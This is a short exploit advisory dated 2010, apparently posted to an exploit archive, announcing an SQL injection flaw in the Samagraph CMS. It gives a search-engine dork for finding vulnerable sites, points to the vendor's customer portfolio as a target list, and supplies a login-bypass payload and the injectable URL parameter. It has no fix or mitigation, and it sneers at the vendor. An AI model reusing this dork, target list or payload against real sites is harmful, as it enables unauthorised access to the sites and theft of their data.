# Title : Sql injection in samagraph product
# Date : 11-03-2010
# Author : K053 
# Vendor : http://www.samagraph.com/
____________________________________________________________________________________________
Cms is fully vulnerable, but just enjoy this zer0day flaw :)) 
-------------------------------------------------------------

Dork : inurl:"fa/inside.aspx?g="
list : http://www.samagraph.com/N2/portfolio.htm
login bypass : ' or '1'='1'--
Vuln : http://blahblah/inside.aspx?g=[sqli]


____________________________________________________________________________________________
>> we hate disclosing but sometimes fool vendor make us !!
____________________________________________________________________________________________